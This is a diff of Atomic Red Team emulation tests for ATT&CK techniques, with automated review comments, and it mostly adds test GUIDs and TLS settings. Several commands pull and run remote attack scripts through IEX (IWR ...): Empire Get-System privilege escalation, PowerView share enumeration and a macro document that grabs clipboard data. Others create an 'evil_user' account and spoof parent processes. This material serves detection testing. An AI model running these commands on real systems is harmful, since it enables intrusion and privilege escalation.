diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 186c2deb..1214c378 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -32,6 +32,10 @@ will be displayed. Additionally, open Registry Editor to view the new entry in H
**Supported Platforms:** Windows
+**auto_generated_guid:** 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
+
+
+
@@ -62,10 +66,14 @@ will be displayed. Additionally, open Registry Editor to view the modified entry
**Supported Platforms:** Windows
+**auto_generated_guid:** 282f929a-6bc5-42b8-bd93-960c3ba35afe
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| new_executable | New executable to run on startup instead of Windows Defender | string | calc.exe|
@@ -97,6 +105,10 @@ Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\Cur
**Supported Platforms:** Windows
+**auto_generated_guid:** c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
+
+
+
@@ -129,10 +141,14 @@ https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterpris
**Supported Platforms:** Windows
+**auto_generated_guid:** cf447677-5a4e-4937-a82c-e47d254afd57
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bad_domain | Domain to add to trusted site zone | String | bad-domain.com|
@@ -169,6 +185,10 @@ Additionally, open Registry Editor to view the modified entry in HKCU:\Software\
**Supported Platforms:** Windows
+**auto_generated_guid:** 15f44ea9-4571-4837-be9e-802431a7bfae
+
+
+
@@ -198,10 +218,14 @@ They can either specify it during the execution of the powershell script or chan
**Supported Platforms:** Windows
+**auto_generated_guid:** f3a6cceb-06c9-48e5-8df8-8867a6814245
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| default_execution_policy | Specify the default poweshell execution policy | String | Default|
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md
index 20adce62..fc466d2d 100644
--- a/atomics/T1113/T1113.md
+++ b/atomics/T1113/T1113.md
@@ -24,10 +24,14 @@ Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
+**auto_generated_guid:** 0f47ceb1-720f-4275-96b8-21f0562217ac
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | /tmp/T1113_desktop.png|
@@ -57,10 +61,14 @@ Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
+**auto_generated_guid:** deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | /tmp/T1113_desktop.png|
@@ -90,10 +98,14 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
**Supported Platforms:** Linux
+**auto_generated_guid:** 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | /tmp/T1113_desktop.xwd|
| package_checker | Package checking command for linux. Debian system command- dpkg -s x11-apps | string | rpm -q xorg-x11-apps|
@@ -119,7 +131,7 @@ rm #{output_file}
##### Description: Package with XWD and XWUD must exist on device
##### Check Prereq Commands:
```bash
-if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```
##### Get Prereq Commands:
```bash
@@ -138,10 +150,14 @@ Use import command from ImageMagick to collect a full desktop screenshot
**Supported Platforms:** Linux
+**auto_generated_guid:** 9cd1cccb-91e4-4550-9139-e20a586fcea1
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | /tmp/T1113_desktop.png|
@@ -164,7 +180,7 @@ rm #{output_file}
##### Description: ImageMagick must be installed
##### Check Prereq Commands:
```bash
-if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
+if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
```
##### Get Prereq Commands:
```bash
@@ -183,10 +199,14 @@ Use Psr.exe binary to collect screenshots of user display. Test will do left mou
**Supported Platforms:** Windows
+**auto_generated_guid:** 3c898f62-626c-47d5-aad2-6de873d69153
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | Path | c:\temp\T1113_desktop.zip|
| recording_time | Time to take screenshots | String | 5|
diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md
index 6e5aa9a7..e641d3bc 100644
--- a/atomics/T1114.001/T1114.001.md
+++ b/atomics/T1114.001/T1114.001.md
@@ -20,10 +20,14 @@ Note: Outlook is required, but no email account necessary to produce artifacts.
**Supported Platforms:** Windows
+**auto_generated_guid:** 3f1b5096-0139-4736-9b78-19bcb02bb1cb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | String | $env:TEMP\mail.csv|
| file_path | File path for Get-Inbox.ps1 | String | PathToAtomicsFolder\T1114.001\src|
@@ -47,7 +51,7 @@ Remove-Item #{output_file} -Force -ErrorAction Ignore
##### Description: Get-Inbox.ps1 must be located at #{file_path}
##### Check Prereq Commands:
```powershell
-if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1}
+if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index c85e124d..1d206989 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
@@ -23,6 +23,10 @@ Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
+**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7
+
+
+
@@ -53,6 +57,10 @@ Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
+**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416
+
+
+
@@ -78,6 +86,10 @@ Echo a command to clipboard and execute it
**Supported Platforms:** macOS
+**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
+
+
+
@@ -103,10 +115,14 @@ This module copies the data stored in the user's clipboard and writes it to a fi
**Supported Platforms:** Windows
+**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word | String | Word|
@@ -115,8 +131,9 @@ This module copies the data stored in the user's clipboard and writes it to a fi
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
```
@@ -136,7 +153,7 @@ try {
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
-} catch { exit 1 }
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml
index d31d6b2a..12bcbf94 100644
--- a/atomics/T1115/T1115.yaml
+++ b/atomics/T1115/T1115.yaml
@@ -62,8 +62,9 @@ atomic_tests:
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA"
- IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard"
cleanup_command: |
Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore
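Review bot: The rewritten `IEX (iwr …)` line now downloads `Invoke-MalDoc.ps1` from the `master` branch of this same repository, so the test executes whatever that branch holds at run time with no pin, whereas the DomainPasswordSpray fetch elsewhere in this commit is pinned to a commit hash. Since the URL path is `atomics/T1204.002/src/Invoke-MalDoc.ps1`, the script appears to ship in the atomics tree itself and could be dot-sourced from the local checkout the way the macro file on the next line already is: `. "PathToAtomicsFolder\T1204.002\src\Invoke-MalDoc.ps1"` (assuming the harness substitutes `PathToAtomicsFolder` here as it does on the `-macroFile` line). That removes both the network dependency and the unpinned remote code load, and lets the test run offline. The enclosing test definition starts above this hunk.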
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index ac5f303f..f85f5632 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -24,6 +24,10 @@ to see what was collected.
**Supported Platforms:** Windows
+**auto_generated_guid:** cb379146-53f1-43e0-b884-7ce2c635ff5b
+
+
+
@@ -55,6 +59,10 @@ to see what was collected.
**Supported Platforms:** Windows
+**auto_generated_guid:** 634bd9b9-dc83-4229-b19f-7f83ba9ad313
+
+
+
@@ -85,6 +93,10 @@ to see what was collected.
**Supported Platforms:** Windows
+**auto_generated_guid:** c3f6d794-50dd-482f-b640-0384fbb7db26
+
+
+
@@ -118,6 +130,10 @@ to see what was collected.
**Supported Platforms:** Windows
+**auto_generated_guid:** aa1180e2-f329-4e1e-8625-2472ec0bfaf3
+
+
+
diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md
index 4a4a879a..18669e5e 100644
--- a/atomics/T1120/T1120.md
+++ b/atomics/T1120/T1120.md
@@ -15,6 +15,10 @@ Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity
**Supported Platforms:** Windows
+**auto_generated_guid:** 2cb4dbf2-2dca-4597-8678-4d39d207a3a5
+
+
+
diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md
index 89a3dc0d..4c71401f 100644
--- a/atomics/T1123/T1123.md
+++ b/atomics/T1123/T1123.md
@@ -17,6 +17,10 @@ Malware or scripts may be used to interact with the devices through an available
**Supported Platforms:** Windows
+**auto_generated_guid:** 9c3ad250-b185-4444-b5a9-d69218a10c95
+
+
+
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md
index f9a8e3d2..6c47ab1a 100644
--- a/atomics/T1124/T1124.md
+++ b/atomics/T1124/T1124.md
@@ -21,10 +21,14 @@ Identify the system time. Upon execution, the local computer system time and tim
**Supported Platforms:** Windows
+**auto_generated_guid:** 20aba24b-e61f-4b26-b4ce-4784f763ca20
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | computer name to query | string | localhost|
@@ -51,6 +55,10 @@ Identify the system time via PowerShell. Upon execution, the system time will be
**Supported Platforms:** Windows
+**auto_generated_guid:** 1d5711d6-655c-4a47-ae9c-6503c74fa877
+
+
+
diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md
index 26dad271..5175ec9f 100644
--- a/atomics/T1127.001/T1127.001.md
+++ b/atomics/T1127.001/T1127.001.md
@@ -19,10 +19,14 @@ Executes the code in a project file using msbuild.exe. The default C# project ex
**Supported Platforms:** Windows
+**auto_generated_guid:** 58742c0f-cb01-44cd-a60b-fb26e8871c93
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | Location of the project file | Path | PathToAtomicsFolder\T1127.001\src\T1127.001.csproj|
| msbuildpath | Default location of MSBuild | Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319|
@@ -43,7 +47,7 @@ Executes the code in a project file using msbuild.exe. The default C# project ex
##### Description: Project file must exist on disk at specified location (#(unknown))
##### Check Prereq Commands:
```powershell
-if (Test-Path #(unknown)) {exit 0} else {exit 1}
+if (Test-Path #(unknown)) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -63,10 +67,14 @@ Executes the code in a project file using msbuild.exe. The default Visual Basic
**Supported Platforms:** Windows
+**auto_generated_guid:** ab042179-c0c5-402f-9bc8-42741f5ce359
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | Location of the project file | Path | PathToAtomicsFolder\T1127.001\src\vb.xml|
| msbuildpath | Default location of MSBuild | Path | C:\Windows\Microsoft.NET\Framework\v4.0.30319|
@@ -87,7 +95,7 @@ Executes the code in a project file using msbuild.exe. The default Visual Basic
##### Description: Project file must exist on disk at specified location (#(unknown))
##### Check Prereq Commands:
```powershell
-if (Test-Path #(unknown)) {exit 0} else {exit 1}
+if (Test-Path #(unknown)) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md
index 0fcad8c1..f3c396c8 100644
--- a/atomics/T1132.001/T1132.001.md
+++ b/atomics/T1132.001/T1132.001.md
@@ -15,10 +15,14 @@ Utilizing a common technique for posting base64 encoded data.
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_url | Destination URL to post encoded data. | string | redcanary.com|
| base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md
index 5a22a3b7..24b4ad2b 100644
--- a/atomics/T1133/T1133.md
+++ b/atomics/T1133/T1133.md
@@ -19,10 +19,14 @@ Running Chrome VPN Extensions via the Registry install 2 vpn extension, please s
**Supported Platforms:** Windows
+**auto_generated_guid:** 4c8db261-a58b-42a6-a866-0a294deedde4
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| chrome_url | chrome installer download URL | url | https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe|
| extension_id | chrome extension id | String | "fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"|
@@ -54,7 +58,7 @@ Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extensio
##### Description: Chrome must be installed
##### Check Prereq Commands:
```powershell
-if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
+if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md
index 05f6a2a7..958ceb8c 100644
--- a/atomics/T1134.001/T1134.001.md
+++ b/atomics/T1134.001/T1134.001.md
@@ -22,6 +22,10 @@ Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-get
**Supported Platforms:** Windows
+**auto_generated_guid:** 90db9e27-8e7c-4c04-b602-a45927884966
+
+
+
@@ -29,6 +33,7 @@ Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-get
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
```
@@ -47,6 +52,10 @@ When executed successfully, the test displays the domain and name of the account
**Supported Platforms:** Windows
+**auto_generated_guid:** 34f0a430-9d04-4d98-bcb5-1989f14719f0
+
+
+
@@ -54,6 +63,7 @@ When executed successfully, the test displays the domain and name of the account
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
```
diff --git a/atomics/T1134.001/T1134.001.yaml b/atomics/T1134.001/T1134.001.yaml
index 13b5dba6..2d0248d3 100644
--- a/atomics/T1134.001/T1134.001.yaml
+++ b/atomics/T1134.001/T1134.001.yaml
@@ -11,7 +11,9 @@ atomic_tests:
supported_platforms:
- windows
executor:
- command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
name: powershell
elevation_required: true
- name: '`SeDebugPrivilege` token duplication'
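Review bot: The added `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12` line replaces the process-wide protocol set instead of extending it, so any stronger protocol the host already has enabled is switched off for the rest of that PowerShell process; the same assignment is added in the second hunk of this file and in the T1135.yaml hunk. Extending the current value keeps what the host already allows while still guaranteeing TLS 1.2: `[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12`. The script fetched on the following line is pinned to a commit, which fixes its content, but it still goes straight into IEX; a sentence in the test description saying that the executor runs remotely fetched code would help anyone vetting the test before running it.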
@@ -22,6 +24,8 @@ atomic_tests:
supported_platforms:
- windows
executor:
- command: IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
+ command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
name: powershell
elevation_required: true
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index 56fae58f..c2fa3995 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -31,10 +31,14 @@ Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/
**Supported Platforms:** Windows
+**auto_generated_guid:** 069258f4-2162-46e9-9a25-c9c6c56150d2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| parent_process_name | Name of the parent process | string | explorer|
| spawnto_process_path | Path of the process to spawn | path | C:\Program Files\Internet Explorer\iexplore.exe|
@@ -64,7 +68,7 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
##### Description: DLL to inject must exist on disk at specified location (#{dll_path})
##### Check Prereq Commands:
```powershell
-if (Test-Path #{dll_path}) {exit 0} else {exit 1}
+if (Test-Path #{dll_path}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
@@ -84,10 +88,14 @@ Spawns a powershell.exe process as a child of the current process.
**Supported Platforms:** Windows
+**auto_generated_guid:** 14920ebd-1d61-491a-85e0-fe98efe37f25
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
| parent_pid | PID of process to spawn from | string | $PID|
@@ -110,7 +118,7 @@ Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine '#{comma
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -129,10 +137,14 @@ Spawns a notepad.exe process as a child of the current process.
**Supported Platforms:** Windows
+**auto_generated_guid:** cbbff285-9051-444a-9d17-c07cd2d230eb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| parent_pid | PID of process to spawn from | string | $PID|
| test_guid | Defined test GUID | string | 12345678-1234-1234-1234-123456789123|
@@ -154,7 +166,7 @@ Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_gu
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -173,10 +185,14 @@ Spawnd a process as a child of the first accessible svchost.exe process.
**Supported Platforms:** Windows
+**auto_generated_guid:** e9f2b777-3123-430b-805d-5cedc66ab591
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_line | Specified command line to use | string | -Command Start-Sleep 10|
| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
@@ -198,7 +214,7 @@ Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
@@ -217,10 +233,14 @@ Creates a notepad.exe process and then spawns a powershell.exe process as a chil
**Supported Platforms:** Windows
+**auto_generated_guid:** 2988133e-561c-4e42-a15f-6281e6a9b2db
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_line | Specified command line to use | string | -Command Start-Sleep 10|
| file_path | File path or name of process to spawn | path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe|
@@ -243,7 +263,7 @@ Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecific
```powershell
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
+if (-not $RequiredModule.ExportedCommands['Start-ATHProcessUnderSpecificParent']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 4cbe849e..3a6992bb 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -27,10 +27,14 @@ Network Share Discovery
**Supported Platforms:** macOS
+**auto_generated_guid:** f94b5ad9-911c-4eff-9718-fd21899db4f7
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | computer1|
@@ -58,10 +62,14 @@ Network Share Discovery using smbstatus
**Supported Platforms:** Linux
+**auto_generated_guid:** 875805bc-9e86-4e87-be86-3a5527315cae
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| package_checker | Package checking command. Debian - dpkg -s samba | string | rpm -q samba|
| package_installer | Package installer command. Debian - apt install samba | string | yum install -y samba|
@@ -81,7 +89,7 @@ smbstatus --shares
##### Description: Package with smbstatus (samba) must exist on device
##### Check Prereq Commands:
```bash
-if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
+if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```
##### Get Prereq Commands:
```bash
@@ -101,10 +109,14 @@ Upon execution avalaible network shares will be displayed in the powershell sess
**Supported Platforms:** Windows
+**auto_generated_guid:** 20f1097d-81c1-405c-8380-32174d493bbb
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Computer name to find a mount on. | string | localhost|
@@ -131,6 +143,10 @@ Upon execution, avalaible network shares will be displayed in the powershell ses
**Supported Platforms:** Windows
+**auto_generated_guid:** 1b0814d1-bb24-402d-9615-1b20c50733fb
+
+
+
@@ -155,6 +171,10 @@ View information about all of the resources that are shared on the local compute
**Supported Platforms:** Windows
+**auto_generated_guid:** ab39a04f-0c93-4540-9ff2-83f862c385ae
+
+
+
@@ -179,6 +199,10 @@ Enumerate Domain Shares the current user has access. Upon execution, progress in
**Supported Platforms:** Windows
+**auto_generated_guid:** b1636f0a-ba82-435c-b699-0d78794d8bfd
+
+
+
@@ -186,12 +210,25 @@ Enumerate Domain Shares the current user has access. Upon execution, progress in
```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
```
+#### Dependencies: Run with `powershell`!
+##### Description: Endpoint must be joined to domain
+##### Check Prereq Commands:
+```powershell
+if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+"Join system to domain"
+```
+
+
diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml
index d7558832..ff02d0ae 100644
--- a/atomics/T1135/T1135.yaml
+++ b/atomics/T1135/T1135.yaml
@@ -88,8 +88,17 @@ atomic_tests:
Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed.
supported_platforms:
- windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Endpoint must be joined to domain
+ prereq_command: |
+ if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}
+ get_prereq_command: |
+ "Join system to domain"
executor:
command: |
+ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
name: powershell
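Review bot: The new `prereq_command` relies on `Get-WmiObject`, which is not available in PowerShell 6 and later (the WMI cmdlets were dropped in favour of the CIM cmdlets), so under pwsh the dependency check errors out instead of reporting a clear not-domain-joined result. The CIM form works on both Windows PowerShell and pwsh and is what this diff already uses elsewhere (T1134.004.md, `Get-CimInstance -ClassName Win32_Process`): `if ((Get-CimInstance -ClassName Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}`. The `get_prereq_command` only echoes `"Join system to domain"`, which is fine as a manual step but worth saying in the description so a runner does not expect it to remediate anything.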
diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md
index ed13f916..de0dfdfd 100644
--- a/atomics/T1136.001/T1136.001.md
+++ b/atomics/T1136.001/T1136.001.md
@@ -27,10 +27,14 @@ Create a user via useradd
**Supported Platforms:** Linux
+**auto_generated_guid:** 40d8eabd-e394-46f6-8785-b9bfa1d011d2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | evil_user|
@@ -60,10 +64,14 @@ Creates a user on a MacOS system with dscl
**Supported Platforms:** macOS
+**auto_generated_guid:** 01993ba5-1da3-4e15-a719-b690d4f0f0b2
+
+
+
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username of the user to create | String | evil_user|
| realname | 'realname' to record when creating the user | String | Evil Account|
@@ -100,10 +108,14 @@ new account, run "net user" in powershell or CMD and observe that there is a new
**Supported Platforms:** Windows
